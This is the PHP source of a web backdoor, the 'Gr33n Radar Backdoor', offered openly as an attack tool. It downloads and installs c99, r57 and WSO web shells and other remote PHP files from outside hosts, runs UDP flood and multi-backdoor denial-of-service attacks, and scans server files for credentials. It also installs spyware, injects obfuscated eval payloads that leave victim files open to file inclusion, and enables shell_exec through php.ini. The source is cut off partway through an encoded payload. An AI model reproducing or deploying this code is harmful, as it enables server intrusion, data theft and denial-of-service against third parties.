<?php /* ##################################################### # Name Software: Gr33n Radar Backdoor # # version: 0.1 # # language: PHP # # Author: Emiliano Febbi # # date: 21/04/2025 # # site: http://nullsite.altervista.org/ # # Contact: emilianofebbi.1994 -at- gmail -dot- com # - Manual backdoor - #####################################################_________________________ |_____________________USAGE:________________________|_________________________| | [1] - For Run backdoor: backdoor_name.php?backdoor=activation | | [2] - War Mode is simple to use. With the DoS NeT Mode you can | | connect up to ten backdoors inserting the full path and launch them. | | | | [3] - It is possible install predefined shells or customized. | | [4] - The backdoor comes with a terminal with a built-in explanation. | | [5] - At the bottom there is a scanner for detecting sensitive files. | | [6] - You can install spyware and run it to spy on files of your choice | | with just a few clicks. | | [7] - There is also a php_injector with which you can infect files of your | | choice using only PHP encoded code. The default code makes the victim | | file vulnerable to RFI/LFI. To exploit the infected file: | | infected_file.php?radar=../../ for LFI | | or ?radar=http://www.site.com/shell.txt for RFI. | | [8] - The backdoor does not work? launch the safe mode: | | Emergency editor: backdoor_name.php?sm_editor=on | | Current Directory files: backdoor_name.php?sm_exp=on | | Root Files Explorer: backdoor_name.php?sm_root_exp=on | |_____________________________________________________________________________| | Description: | |-----------------------------------------------------------------------------| |Good alternative to a web shell, I would say superior. | |The backdoor uses an obfuscation method to avoid detection, and also contains| |an automatic scanner that detects open ports on the server. | |_____________________________________________________________________________| After used DoS-NeT attack click button Home , for restore script. enjoi! */ $myname = $_SERVER['PHP_SELF']; $identy = $_SERVER['SERVER_NAME']; $today = date("F j, Y, g:i a", time()); //Code block shells installer (Thanks www.localroot.net) /*------------------------------------------------------------------------------------*/ /* C99 */ /*------------------------------------------------------------------------------------*/ if (isset($_GET['installc99'])) { //| $getc99 = file_get_contents("https://www.localroot.net/shell-c99-php-7.txt"); //| $fp = fopen("c99.php","w"); //| fputs ($fp,"$getc99"); //| fclose($fp); //| echo '<script>alert("c99 installed!")</script>'; //| header( "refresh:1;url=$myname?backdoor=activation"); //| }; //| if (isset($_GET['deletec99'])) { //| unlink("c99.php"); //| echo '<script>alert("c99 removed!")</script>'; //| header( "refresh:1;url=$myname?backdoor=activation"); //| };; //| /*------------------------------------------------------------------------------------*/ /*------------------------------------------------------------------------------------*/ /* r57 */ /*------------------------------------------------------------------------------------*/ if (isset($_GET['installr57'])) { //| $getr57 = file_get_contents("https://www.localroot.net/shell-r57.txt"); //| $fps = fopen("r57.php","w"); //| fputs ($fps,"$getr57"); //| fclose($fps); //| echo '<script>alert("r57 installed!")</script>'; //| header( "refresh:1;url=$myname?backdoor=activation"); //| }; //| if (isset($_GET['deleter57'])) { //| unlink("r57.php"); //| echo '<script>alert("r57 removed!")</script>'; //| header( "refresh:1;url=$myname?backdoor=activation"); //| };; //| /*------------------------------------------------------------------------------------*/ /*------------------------------------------------------------------------------------*/ /* WSO */ /*------------------------------------------------------------------------------------*/ if (isset($_GET['installWSO'])) { //| $getWSO = file_get_contents("https://www.localroot.net/shell-wso-php-7.txt"); //| $fpWSO = fopen("WSO.php","w"); //| fputs ($fpWSO,"$getWSO"); //| fclose($fpWSO); //| echo '<script>alert("WSO installed!")</script>'; //| header( "refresh:1;url=$myname?backdoor=activation"); //| }; //| if (isset($_GET['deleteWSO'])) { //| unlink("WSO.php"); //| echo '<script>alert("WSO removed!")</script>'; //| header( "refresh:1;url=$myname?backdoor=activation"); //| };; //| /*------------------------------------------------------------------------------------*/ //For activate backdoor <-- filename.php?backdoor=activation --> if(!empty($_GET['backdoor']=="activation")) { print '<center><pre>Welcome to'; print ' _ _ _ _ _ (_)(_)(_)(_) _ (_) (_) (_) _ _ _ _ _ _ (_) _ _ _ _ _ _ (_) _ _ _ (_) (_)(_)(_) _ _(_)(_)(_)(_) (_)(_)(_) _ (_)_ _ (_)(_) (_)(_)(_)(_) _ _ _ (_) (_) (_) _ _ _ (_) (_)(_) (_) (_) _ _(_)(_)(_)(_) (_) (_) _(_)(_)(_)(_) (_) (_) (_) _(_)_ _ _ (_)_(_)_ _ _ (_)(_)_ _ _ (_)_ (_) (_) (_) (_)(_)(_) (_) (_)(_)(_)(_) (_)(_)(_) (_)(_) backd00r '; print "</pre></center><br>"; print ' <style> .WARMODE { animation: warm 1s infinite; } @keyframes warm { 0% {background-color: red;} 25%{background-color:lime;} 50%{background-color:red;} 75%{background-color:lime;} 100% {background-color: red;} } </style>'; print "<div style='float: left; text-align: left;'>$today</div> <a href='?backdoor=activation&mode=war'><button class='WARMODE' style='width:965px;'>WAR MODE</button></a> <div style='float: right; text-align: right;'> <a href='?backdoor=activation&scanme=do'><font color='lime'>$identy</font><a><a href='$myname?backdoor=activation'> <button style='background-color:#00ffff'>~Home</button></a></div><br>"; //#Single DoS and DoS Net /*------------------------------------------------------------------------------------*/ /* War Mode */ /*------------------------------------------------------------------------------------*/ //# --Single UDP Flood-- $j = " / \ `. __..-,O : \ --''_..-'.' | . .-' `. '. : . .`.' \ `. / .. \ `. ' . `, `. \ ,|,`. `-.\ '.|| ``-...__..-` | | |__| /||\ //||\\ // || \\ __//__||__\\__ '--------------'"; if(!empty($_GET['backdoor']=="activation" and $_GET['mode']=="war" )) { echo "<center><pre> $j </pre></center>"; echo '<center><div style="width:200px; height:40px; border:1px solid lime;"> <font color="lime"><br><b>--UDP Flood--</b></font></div><br> <form action=? method=GET> <input type="hidden" name="backdoor" value="activation"> IP address: <br><input type=text style="background-color:#00ffff" name=host value=><br> Length (seconds): <br><input type=text style="background-color:#00ffff" name=time value=><br> <input type=submit class="WARMODE" value=ON></form></center>'; //#DoS-NeT --UDP Flood-- echo' <center><form action="'.$SERVER[PHP_SELF].'" method="POST"> <div style="width:200px; height:40px; border:1px solid lime;"> <font color="lime"><br><b>--DoS-NeT Flood--</b></div><br> IP Address:<br> <input type="text" style="background-color:#00ffff" name="ip_adrrs" value="127.0.01"><br> Length (seconds):<br> <input type="text" style="background-color:#00ffff" name="dos_time" value=""><br> All backdoors positions:<br> <input type="text" style="background-color:#00ffff" name="net1" value="https://www.site.com/backdoor_path.php"><br> <input type="text" style="background-color:#00ffff" name="net2" value="https://www.site.com/backdoor_path.php"><br> <input type="text" style="background-color:#00ffff" name="net3" value="https://www.site.com/backdoor_path.php"><br> <input type="text" style="background-color:#00ffff" name="net4" value="https://www.site.com/backdoor_path.php"><br> <input type="text" style="background-color:#00ffff" name="net5" value="https://www.site.com/backdoor_path.php"><br> <input type="text" style="background-color:#00ffff" name="net6" value="https://www.site.com/backdoor_path.php"><br> <input type="text" style="background-color:#00ffff" name="net7" value="https://www.site.com/backdoor_path.php"><br> <input type="text" style="background-color:#00ffff" name="net8" value="https://www.site.com/backdoor_path.php"><br> <input type="text" style="background-color:#00ffff" name="net9" value="https://www.site.com/backdoor_path.php"><br> <input type="text" style="background-color:#00ffff" name="net10" value="https://www.site.com/backdoor_path.php"><br> <input type=submit class="WARMODE" value=Massive_Attack></form></center></form></center>'; } if(isset($_GET['host'])&&isset($_GET['time'])) { $packets = 0; ignore_user_abort(TRUE); set_time_limit(0); $exec_time = $_GET['time']; $time = time(); $max_time = $time+$exec_time; $host = $_GET['host']; for($i=0;$i<65000;$i++){ $out .= 'X'; } while(1){ $packets++; if(time() > $max_time) { break; } $rand = rand(1,65000); $fp = fsockopen('udp://'.$host, $rand, $errno, $errstr, 5); if($fp) { fwrite($fp, $out); fclose($fp); } } echo "<center><pre> $j </pre></center>"; $host_r = strip_tags("$host", ENT_QUOTES); print "<script>alert('--DoS Completed--FROM $identy To $host_r')</script>"; print_r ("<center><font color='lime'><br><div style='width:200px; height:40px; border:1px solid lime;'><b>--UDP Flood--</b> </div><br>[$host_r] ~ Completed with $packets (" . round(($packets*65)/1024, 2) . " MB) packets averaging ". round($packets/$exec_time, 2) . " packets for second</font> \n"); echo '<br> <form action="'.$surl.'" method=GET> <input type="hidden" name="backdoor" value="activation"> IP address: <br><input type=text style="background-color:#00ffff" name=host><br> Length (seconds): <br><input type=text style="background-color:#00ffff" name=time><br> <input type=submit class="WARMODE" value=ON></form></center>'; header( "refresh:3;url=$myname?backdoor=activation"); } //#DoS-NeT --UDP Flood 2-- /*------------------------------------------------------------------------------------*/ /* DoS-NeT code */ /*------------------------------------------------------------------------------------*/ eval(gzuncompress(base64_decode(str_rot13('rWl1yA9XjmNHu+/7STTZEF/phi4iAuBsDZTOS6BHefy fpYnFOe0DsKoo1qExDKVu6IK4mvU9swyj6BSvKgmsCJk3xY4JWJnftmxbTjjRkz1KpCcPrgllvGnRemKv9pEEx n81OEbWAEWcWVo52p2W1cCdvv7ZY8TUZksMNNW63TgaYxWX9q/psK24F6dA6HshdqjG3Sr5Y3vt8xQjHBJu4WU XV8SwyprPWlcCOR9Iax653YAt7yNuIq2PJInEuuB22K3y4Nb8ycFQoH3N7MRjiykzr7nMGn30jZe+NFyTjl14Q DTa/RwD+SwtaJWrV+uPHOC6ICCGfJZItvrWz31MCrB2MnvfBU0eBJ2oEq12UR2mJjmGDABb4PMows/8J8XGWGl GuTqUjcpysWBRo0pvxPHPx0EtElXHW HXGETuUVcVyVcARMRpvyvIvx0EfElXEWEXGETWUVcHyHcARnxrv33algaXA68e9y4pQGy+2+yziiqsaA+G0pKD= ')))); //#Server Autoscanner-- if(!empty($_GET['backdoor']=="activation" and $_GET['scanme'])) { echo "<center><font color='lime'><i>Scanner $identy results:</i></font></center><br>"; ini_set('max_execution_time', 0); ini_set('memory_limit', -1); $portsz = array(21, 22, 25, 80, 81, 110, 143, 443, 587, 2525, 3306); foreach ($portsz as $portz) { $connectionzx = @fsockopen($identy, $portz, $errno, $errstr, 2); if (is_resource($connectionzx)) { echo '<center><pre>' . $identy . ':' . $portz . ' ' . '(' . getservbyport($portz, 'tcp') . ') is open.</pre></center>' . "\n"; fclose($connectionzx); } else { echo '<center><pre>' . $identy . ':' . $portz . ' is closed.</pre></center>' . "\n"; } } } //scanner end /*------------------------------------------------------------------------------------*/ /* War Mode End */ /*------------------------------------------------------------------------------------*/ print '<html><head><title>Gr33N Radar Backdoor v0.1</title><style> body { cursor: crosshair; min-height: 200vh; }</style> </head><body><center><body bgcolor="#000000"> <body text="#00ffff"><body link="#008080"> <body vlink="#008080"> <div style="width:100%;border:10px ridge aqua;box-sizing: border-box;">'; echo "<h2>--PHP Shells Management--</h2>"; if (false!==file("c99.php")) echo "<font color='red'>c99 2.0 shell installed</font> - <a href='c99.php'>view</a> / <a href='?deletec99=do'>~delete</a>"; else echo ' <a href="?installc99=do"><font color="lime">install c99 2.0 shell</font></a>'; print "<br>"; if (false!==file("r57.php")) echo "<font color='red'>r57 shell installed</font> - <a href='r57.php'>view</a> / <a href='?deleter57=do'>~delete</a>"; else echo ' <a href="?installr57=do"><font color="lime">install r57 shell</font></a>'; print "<br>"; if (false!==file("WSO.php")) echo "<font color='red'>WSO shell installed</font> - <a href='WSO.php'>view</a> / <a href='?deleteWSO=do'>~delete</a>"; else echo ' <a href="?installWSO=do"><font color="lime">install WSO shell</font></a>'; print "</div><br>"; //#Favorite Shell installer echo '<div style="width:100%; height:50%; border:10px ridge aqua;box-sizing: border-box;"> <h2>Install external PHP File:\_</h2> <form action="'.$SERVER[PHP_SELF].'" method="POST"> <input type="text" style="background-color:#00ffff" name="favorite" value="http://www.site.com/shell.txt"><br> <input type="text" style="background-color:#00ffff" name="favorite_nm" value="filename.php"><br> <input type="submit" style="background-color:#00ffff" value="install"/></form><br> <h3>--Favorites Shells installed--</h3>'; if(!empty($_POST['favorite'] && $_POST['favorite_nm'])) { $install_fav = $_POST['favorite']; $install_fav_nm = $_POST['favorite_nm']; $getsfav = file_get_contents("$install_fav"); $fpp = fopen("bck_$install_fav_nm","w"); fputs ($fpp,"$getsfav"); fclose($fpp); $realnmm = basename($install_fav); echo "<script>alert('$realnmm installed!')</script>"; };;; //listing your external installations $ext = array("php","html","htm",); foreach ($ext as $extt) { foreach (glob("./*.$extt") as $filename) { $prefix = 'bck_'; if (strpos($filename, $prefix) != false) { $cleanme = basename($filename); echo "- <a href='$cleanme'><font color='lime'>$cleanme</font></a><br>"; } } };;;; /*------------------------------------------------------------------------------------*/ /* #Terminal version 0.1 */ /*------------------------------------------------------------------------------------*/ echo'</div><br><div style="width:100%;border:10px ridge aqua;box-sizing: border-box;"><font color="lime"> <br><div style="width:400px; height:280px; border:1px solid lime;"><i>#HELP--</i><br><-- Terminal Commands --><br> "rename" = rename file<br> "unistall" = unistall backdoor<br> "wget https://www.site.com/file.jpg" = wget file<br> "delete" = delete file<br> "getSRVip" = see server IP <br> "phpinfo" = phpinfo calling<br> "system" = see system info<br> "mysql" = database INFO<br> "php.ini" = set safe_mode off & shell_exec = On<br> "php_uname" = get php_uname INFO<br> "disabled_func" = PHP Disabled Functions<br> "open_basedir" = Alloweds paths for using PHP<br> "memory_d" = Memory disk INFO<br></div> <br>Terminal:\_</font><br> <form action="'.$SERVER[PHP_SELF].'" method="POST"> <textarea name="command" rows="10" cols="50" style="background-color: aqua;color:#000000;">~backdoor>> command</textarea><br> </font> <input type="submit" value="execute" style="background-color:#00ffff"> </form>'; if($_POST['command'] == "~backdoor>> rename") { $ren = $_POST['command']; $rename = '~backdoor>> rename'; if (strpos($ren, $rename) != true) { echo'<form action="'.$SERVER[PHP_SELF].'" method="POST"> <input type="text" name="oldname" style="background-color: aqua;color:#000000;" value="oldname.format"> <input type="text" name="newname" style="background-color: aqua;color:#000000;" value="newname.format"> <input type="submit" value="rename" style="background-color:#00ffff"> </form>'; } } //#rename if($_POST['oldname'] and $_POST['newname']) { $olddname = $_POST['oldname']; $newwname = $_POST['newname']; rename($olddname , $newwname); echo '<script>alert("renamed file!")</script>'; };; //#unistall if($_POST['command'] == "~backdoor>> unistall") { $unistall_me = $_SERVER['PHP_SELF']; unlink(basename($unistall_me)); echo '<script>alert("backdoor uninstalled!")</script>'; } //#wget if(strpos($_POST['command'] , '~backdoor>> wget') !== false) { $uno = "~backdoor>> wget "; $wget = $_POST['command']; $due = ""; $url = str_replace($uno,$due,$wget); $fileee = file_get_contents($url); $nameeee = basename($url); $exttt = pathinfo($url, PATHINFO_EXTENSION); $namee2 =pathinfo($url, PATHINFO_FILENAME); $processing = "wget.txt"; $fp = fopen($processing,"w"); fputs ($fp,"$url"); fclose($fp); $line = file($processing)[0]; $grabbing = file_get_contents("$line"); $fp = fopen("$namee2.$exttt","w"); fputs ($fp,"$grabbing"); fclose($fp); unlink("wget.txt"); }; //#delete if($_POST['command'] == "~backdoor>> delete") { echo'<form action="'.$SERVER[PHP_SELF].'" method="POST"> <input type="text" name="deletef" style="background-color: aqua;color:#000000;" value="filename.php"> <input type="submit" value="delete" style="background-color:#00ffff"> </form>'; } if (isset($_POST['deletef'])) { $trashfile = $_POST['deletef']; unlink("$trashfile"); echo "<script>alert('$trashfile deleted!')</script>"; } //#GeT Server IP if($_POST['command'] == "~backdoor>> getSRVip") { $getSRVip = getHostByName(getHostName()); $userADDr = $_SERVER['REMOTE_ADDR']; echo "Server addr. $getSRVip<br>"; echo "Your addr. $userADDr"; echo "</div>"; } //#phpinfo if($_POST['command'] == "~backdoor>> phpinfo") { echo phpinfo(); } //#system info if($_POST['command'] == "~backdoor>> system") { $Wserver = $_SERVER['SERVER_SOFTWARE']; echo "<i>Web server</i> :. $Wserver"; echo "<br><i>system</i> :. "; echo PHP_OS; echo "<br><i>System admin </i> :. "; echo $_SERVER['SERVER_ADMIN']; } //#MySQL dedicate if($_POST['command'] == "~backdoor>> mysql") { echo '<form action="'.$SERVER[PHP_SELF].'" method="POST"> <input type="text" style="background-color:#00ffff" name="dbuser" value="database user"><br> <input type="text" style="background-color:#00ffff" name="dbpass" value="database pwd"> <br> <input type="text" style="background-color:#00ffff" name="dbname" value="database Name"><br> <input type="submit" style="background-color:#00ffff" value="execute"/></form><br>'; } if(!empty($_POST['dbuser'] && $_POST['dbpass'] && $_POST['dbname'])) { $dbhost = "localhost"; $dbuser = $_POST['dbuser']; $dbpass = $_POST['dbpass']; $dbname = $_POST['dbname']; $conn = new mysqli($dbhost, $dbuser, $dbpass, $dbname); //connection if($conn->connect_error) { die("Connection failed! " . $conn->connect_error); } //#db version echo '<div style="width:200px; height:30px; border:1px solid lime;"> <font color="lime">Database Version:</font></div>'; echo mysqli_get_client_info(); //#tables $sql = "SHOW TABLES"; $result = $conn->query($sql); if($result->num_rows > 0) { echo '<br><br><div style="width:200px; height:30px; border:1px solid lime;"> <font color="lime">Tables List on Current DB:</font></div>'; while($row = $result->fetch_array()) { echo "-----> "; echo $row[0] . "<br>"; } } else { echo "<br>No tables Found<br>"; } //databases(); $sql2 = "SHOW DATABASES"; $resultt = $conn->query($sql2); if($resultt->num_rows > 0) { echo '<br><div style="width:200px; height:30px; border:1px solid lime;"> <font color="lime">Databases List:</font></div>'; while($roww = $resultt->fetch_array()) { echo "-----> "; echo $roww[0] . "<br>"; } } $conn->close(); }; //#safe_mode OFF && shell_exec On if($_POST['command'] == "~backdoor>> php.ini") { if (!file_exists("php.ini")) { $writePHP = fopen("php.ini", 'a'); fwrite($writePHP, "safe_mode = off\nexec = On\nshell_exec = On "); fclose($writePHP); echo "php.ini installed - safe_mode is off now!<br>"; } elseif (file_exists("php.ini")) { echo "<script>alert('php.ini already exist!')</script>"; } } //#php_uname command if($_POST['command'] == "~backdoor>> php_uname") { print php_uname(); } //#php functions blocked if($_POST['command'] == "~backdoor>> disabled_func") { $disabled_funcSRV = @ini_get("disable_functions"); print "-----> PHP Disabled Functions on $identy<br>"; print_r ("~[$disabled_funcSRV]"); } //#alloweds paths for working with --PHP-- if($_POST['command'] == "~backdoor>> open_basedir") { $obx = @ini_get("open_basedir"); print "-----> Alloweds paths By PHP<br>"; print_r ("~[$obx]"); } //#Srv disk --memory-- if($_POST['command'] == "~backdoor>> memory_d") { $sdir = '/'; //get disk space free (in bytes) $disk_free = disk_free_space($sdir); $disk_total = disk_total_space($sdir); $disk_used = $disk_total - $disk_free; $disk_used_p = sprintf('%.2f',($disk_used / $disk_total) * 100); function convertSize( $bytes ) { $sizes = array( 'B', 'KB', 'MB', 'GB', 'TB' ); for( $i = 0; $bytes >= 1024 && $i < ( count( $sizes ) -1 ); $bytes /= 1024, $i++ ); return( round( $bytes, 2 ) . " " . $sizes[$i] ); } $disk_free = convertSize($disk_free); $disk_used = convertSize($disk_used); $disk_total = convertSize($disk_total); echo '<center> <div style="width:160px; height:30px; border:1px solid lime;"> <font color="lime">[Memory Disk INFO:]</font></div><br>'; echo "~Total: $disk_total<br>"; echo "~Used: ".$disk_used." ($disk_used_p%)<br>"; echo "~Free: $disk_free<br>"; echo "</center>"; } //#terminal end echo '</div></table><div style="float: left; text-align: left;"><a href="?intF=do"><h1><font color="lime">?#</font></h1></a><i>interessing Files</i></div>'; echo '<div style="float: right; text-align: right;"> <a href="?inj_=do"><h1><font color="lime">?#</font></h1></a><i>RFI/LFI --PHP_Injector</i></div>'; echo '<div style="float: center; text-align: center;">'; echo '<a href="?spyware_=do"><h1><font color="lime">?#</font></h1></a><i>Spyware installation</i><br>'; //using spyware if (false!==file("system_sql.php")) echo "<font color='red'>spyware installed</font> - <a href='bconfiguration.txt'>view logs</a> / <a href='?delspy=do'>~delete</a><br> <a href='?filespy=do'><font color='lime'>[~] - Select File to Spy</font></a>"; else echo '<a href="?installspy=do"><font color="lime">install spyware</font></a>'; echo'</div>'; echo '<center><br> [Code By Emiliano Febbi] ~My Site:<a href="http://nullsite.altervista.org"> <font color="lime">nullsite.altervista.org</font></a>'; echo "</center></body></html>"; } else { //Backdoor --obfuscation System-- $hostname = $_SERVER['HTTP_HOST']; $curl = curl_init("http://$hostname"); curl_setopt($curl, CURLOPT_NOBODY, true); $result_ = curl_exec($curl); if ($result_ !== false) { $statusCode = curl_getinfo($curl, CURLINFO_HTTP_CODE); if ($statusCode == 404) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, 'http://'.$hostname.'/404site'); curl_setopt($ch, CURLOPT_HEADER, 0); curl_exec($ch); curl_close($ch); } else { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, 'http://'.$hostname.'/404site'); curl_setopt($ch, CURLOPT_HEADER, 0); curl_exec($ch); curl_close($ch); } } else { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, 'https://'.$hostname.'/404site'); curl_setopt($ch, CURLOPT_HEADER, 0); curl_exec($ch); curl_close($ch); } };;;;; /*---------------------------------------------------------------------------------------------------------*/ /* Backdoor #HELPER 0.1 */ /*---------------------------------------------------------------------------------------------------------*/ //sensitive files checker $myname2 = basename($myname); if (isset($_GET['intF'])) { print '<html><body><body text="#00ffff"> <center><br><a href="?backdoor=activation"> <button style="background-color:#00ffff">~Home</button></a> <br><div style="width:200px; height:30px; border:1px solid lime;"> <font color="lime"> #Sensitive Files List:</font></div>'; $sensitive = array("user", "username", "password", "pwd", "pass", "config", "dbhost", "dbuname", "dbname", "dbpass", "dbtype", "admin", "root", "md5", "dbuser", "ftp", "database", "users", "user_name", "login", "host", "db", "ftp_host", "ftp_pass", "ftp_user", "ftp_root", "prefix"); foreach($sensitive as $sensitive_files) { $dir777 = './'; $files777 = scandir($dir777,1); foreach ($files777 as $lines777) { if(strlen($lines777) > 3 && strpos($lines777, '.php', '.html', '.txt', '.asp', '.aspx', '.js') !== false) { $readfile777 = fopen('./'.$lines777, 'r'); while(!feof($readfile777)) { $contents777 = fgets($readfile777); if(strpos($contents777, $sensitive_files) !== false) echo str_replace("$myname2", "" , "<br>$lines777"); } fclose($readfile777); } } } } //#PHP_Injector if (isset($_GET['inj_'])) { // LFI ~ RFI //For activate RFI/LFI on victime Page infected <-- filename.php?radar=../ or filename.php?radar=http://www.site.com/shell.txt --> echo'<center><br><a href="?backdoor=activation"> <button style="background-color:#00ffff">~Home</button></a><br> <div style="width:350px; height:50px; border:1px solid lime;"> <font color="lime">--Bad Code injector [Default code] - RFI/LFI page infection</font></div><br> <form action="'.$SERVER[PHP_SELF].'" method="POST"> <input type="text" style="background-color:#00ffff" name="file_nameinj" value="filename.php"><br> <textarea name="php_injection" rows="10" cols="50" style="background-color: aqua;color:#000000;"> eval(str_rot13(gzinflate(str_rot13(base64_decode(" LUjHDva4DXyaxWFh7gU5uX7uvV8C9967nz5p/hgGWcnSVRySw6Ue 7n+2/ojXeyiXf8ahSzDkP/ MyJfPyQj40SH7/f/C3rPIwkPwGWonWlpzNcwyvdpQvf5hhisMNQp la8/oLsusaSoN5cxKrP/ lqnBKFzNr2eIWT9heki7y2b3bsvhNHunalAr7WOx++n1oWonMLGK tCo74b4jYTIZzJzy0LZ E8FylDIday9JTctecpRvGrbzyB9IymlvXwHU7hpGWlVr8nLWCudY JAfdctUUHCCoo8Y6fT+KrM rMvWMMKEnY6a4Ix21cp4nZ3a61AtmFgBB2vEZq03BdFvtaE+vWED e40NJ2QYDsd/dIHkPL8m cVrMEC9mW8kQLT92cGq8XvsQPShyu7Dz4F/vEjIUW+ab2nhwDFYs Pka90ovr5P7/QJ9S9J oDyzwAeQRDcNi3CHCgPptuTpGOFwiyjoLxsMSatlNgXI+7KQLvCf iQOFxBr0Y18tLebH ItHYqHLlbYDG5qy1wMHj86aJ2Rek1ydl13LZlRdxfVIeRsf50hCD QkXA3Lv6Ss8UYPrUe/ 8oPYfm/6LWL9TR467zfPDnpZ/b0iqSdAr8hcxoiNENH3nY1AE+qu FfDeCzJvIVms6BNLjj ePuKGOGBbco+czXWqgexZWKar4UfiRrUD+5+Cm16hUpkvM5jDVWv uPDh+jAT9m2+nTHzlweW /8YaU4mwNyWV5qktEbGYg7Y8fKuuF3F05mhYRarNny1w1aV0t3u4 XSCm422dhQeTaZ73K7GBlj/nm/ L5SWPViG/Nx2UhC0Q4wSd3XIjSGJozd4I6bP0xdPUuLtm8eqJ7LF ADx8fIxgrxNFPUfBkCcJLntlVN D4Qcy5d5C5RsfwqnpqFKQB/ Ai1KXyb1I25G7o4p8+lHR4Z1As1eY6TsAREbV8avmbmjFx9YYPSH abWjMtCRm9jAVQLrmsiPk6wkWc5bPl+GF N9hXq96vpiUGqGRw /GdXhdgfKEnT+WzwfeLKjLcw2OEfm82SGBHHXfnVjAzxvPGeRfcH UHeeKnpmMY3CTD8k2khwQDZE9ZecSvwMt pLh5kLC2fD1g3uGcW0+ RVDHIhv2mjHC5aE0Xolz3LBnQI5E07gXEDse3Qfa/ tLX15DQhhmrRRjhA3Rxuq08UIGXDXFAxRTrK7a9JCpw0eLcU0SmGlO/ 6TY8bGfZ5Z0t3248RpILJ6iHo00gjij0z5CHcH5rk7I+vprzG0Fv+ gE7YdGmAWOv3M/DmsXmEnhSmVNg7q/ VVNJfB3vuVR5fEVl316ZOu+HfgLvwEU+NOsKa8Cg6GVTKqlup5oY PgmDnC0+bkUP8QIhiUjXeEk+CtZ4i25OGYN8an6aEzouN27DEv+KN djzC2HrpyM771G yQ3TyJx5CvKW/hPWZ2M2QlaPWlFGP1W0+j26pmdD4wwnFOdleR/ v8MltYqcBrzEI8G+80mGHuKsFeFzUeGp+XXir2YdGqDqs06a3LI1s RCAYTqRCb8+rswo/ xuI7kzLEPS3ajxIOWctjaLpc4GNwGSrwWVAJOhZuk4yexv2y4x/cs 7tjfG1WGnceNaUTYUtK/ xEzXJ1dUNxjQDMg9tS1TEYWwvdlYlOkTo4dIjL3pRJaNFu22eZ3W1 rQ0NtGj37 7CX50yTFGwM3DoHL5Jcxcu43pFBVOeUEseRHyMrENmsrL6OjjpKab nhh4YnE4VHNMDV3ZZalQAjIPg3E6dY/ PEPXvBz3cmv85JUekNo625J8hQSIKUWAl7Prsm/ND25SzWAT0a/mc wLG0VFfVep6uBL1Z2XJBQoIQ7ZBvznI ut8VE0tDV0Xsy 9eqXL3fyazX7xsCRmtaNKKUfdhKiS4AjPN7cJn3ltvBtM0Fd2sou0 PsYyFl4YMUakmrTTSyTFmT2ACmXHFR/ qlCtZ2v2dLmDjpwRHexy/vEJJVzbHfNdanyjODbWgadDV34pYTErO v/ndbov0cwXP6KhtF/ I40aKhKKnWsA6rCqlGzeAC+haqXZqD5ZAM6UCjpnliKzpSPt+eyRD Whjr0XQmgrv/ yZHkNr+IIJS4Twk728Ry6ZR1wmJDtdOYvysVK1ENIhuLmVf1NNwg+ N7dfgDnTv9Pa7lKjRlgx8mAdz99m9Mqg3qSR /eJXnL/ khpWVU89pFl9uFBeLk5LHSFcTreWAuEuW3wt3WOIbnCGXAnnm1fA+ lFccYwnQiWEem8urU28ITNTrEwagrifIRyM/ svmvQQJM5zrS5I0G3luEwHMgoAHvCGctvEJTYIq6wgcPYgYnhl2vR TLfXNELQYK0R5c0iDYZ81dXDataLW2Qu+W6 +vqz1cI31IV587V1ORksfils5IctjlrulH3vz2c9hjdWwqrHfb9H1 rN689cXctBnJ2oU1o2H5Zhqm/ 0UvJbs5CvLWXmJHxWfR9uE+2+uXj5o+3+q970l9ee7Wn/B5t//bZ9//xc=")))));</textarea><br> </font><input type="submit" value="INJECTION" style="background-color:#00ffff"> </form>'; if (!empty($_POST['file_nameinj'] and $_POST['php_injection'])) { $file_nameinj = $_POST['file_nameinj']; $php_injection = $_POST['php_injection']; rename("$file_nameinj", "$file_nameinj.txt"); $target_x = "3"; $statsz = file("$file_nameinj.txt", FILE_IGNORE_NEW_LINES); $offsetb = array_search($target_x,$statsz) +1; array_splice($statsz, $offsetb, 0, $php_injection); file_put_contents("$file_nameinj.txt", join("\n", $statsz)); $format_erase = str_replace(".txt", "", "$file_nameinj.txt"); rename("$file_nameinj.txt", "$format_erase"); print "<script>alert('$format_erase now is vulnerable!')</script>"; } } //_______________________________ //|#Spyware Block code dedicated | //|______________________________| if (isset($_GET['delspy'])) { unlink("bconfiguration.txt"); unlink("system_sql.php"); echo '<script>alert("spyware removed!")</script>'; header( "refresh:1;url=$myname?backdoor=activation"); } if (isset($_GET['installspy'])) { /*--------------------------*/ /*| Creation File Spyware |*/ /*--------------------------*/ $spyware_code = "<? eval(str_rot13(gzinflate(str_rot13(base64_decode('LUnHEqw4EvyaiWx7w5vYE9433l42Gu99475+xMRlAIRXTFNWpdZzvP/ sw/Hd7rFN/1lwuRLY/5ZoQZf1QjG2aGT/f/ C3plm+k0qqzSFm83bjNavL1jercGrs7IH623Yaf8L+T1ntTaZEFJnFFyDMJNAND7GdH+CpnaRAdP5P3OPbFBDhWQa5l2CIZbS5yOdVN5W f7b68jrODsQVBn5F0CQZ6bV+kQ0wi++14ABwY6k1F++HhtTXYiu8uXhhPwyQM7ddgnY8u9MfyhV1G8g+oE7vNCSyzk5wvvG2wvBBhOj+s obsFDbAcQlekb4IZJKQQSeDcGJUZGpWiW3h+0OcAJhdVypU7Rg0Z9WokhOsjyD5VUv6MnrEKIlg6FbvCz7efDRar1hITqVoxPwPNBZfDm YQDHzfAZLtRaa1fKK2YiptvZLuXCz4Lk/52G+0azrZupjTqwjuCNjCBlV8Jht3sYCzCYJU5IUwv3G6tK2KLVCxidKxdmD4gOAjbIc/3xe Hoq5Tl0c54Ag1guxb/bjOjwh+YifyAQ3AVp80cQRYj/FlfrjSDy1UgVIFkv6okpGq/BY3kJx4d5HawYcDwe4DUq47fBEAbOq5Kydh3S0j 5OjIIsTYhhv59uFLWg92HGT05xYC760n+gUywJBB5oqpYZPjhX5jBYt+B5pvsWCNGcBGYsGVUPoZvpKg109/TjcrXROF7qAotTX7VJA7T MkgeqRVImyjhYM3Mw1oki+RQqzMwXlib1ygevNUr/VV4gbKScacdpCngW5YipBC7e6b3qvoQpvcZyOs3KMJCx9k3Al8X+99dcDz6dUmRT QIcDUo7c2sgxT0riEssztBJLNY+AOuW6jq8hXoN2s/vIqmjV24vJVp4XMDTpUoYjGmryxWsVLmeFFhX1GGS6WmMaXIUUrffxtx0tum+jO 